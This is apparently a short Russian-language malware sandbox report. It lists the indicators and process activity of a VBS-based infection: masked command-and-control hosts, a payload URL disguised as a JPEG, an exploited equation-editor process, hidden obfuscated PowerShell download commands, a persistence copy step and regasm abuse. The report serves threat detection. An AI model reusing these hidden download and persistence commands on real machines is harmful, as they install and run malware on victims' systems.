Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\imaginebeautifulkiss.vbs"
- %APPDATA%\imaginebeautifulkiss.vbs
- '19#.#4.57.54':80
- 'pa##e.ee':443
- http://19#.#4.57.54/20090/imginequalitypic.jpg
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgT...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %ALLUSERSPROFILE%\SRVR.vbs' (со скрытым окном)
- '%CommonProgramFiles(x86)%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgT...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Copy-Item -Path *.vbs -Destination %ALLUSERSPROFILE%\SRVR.vbs
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'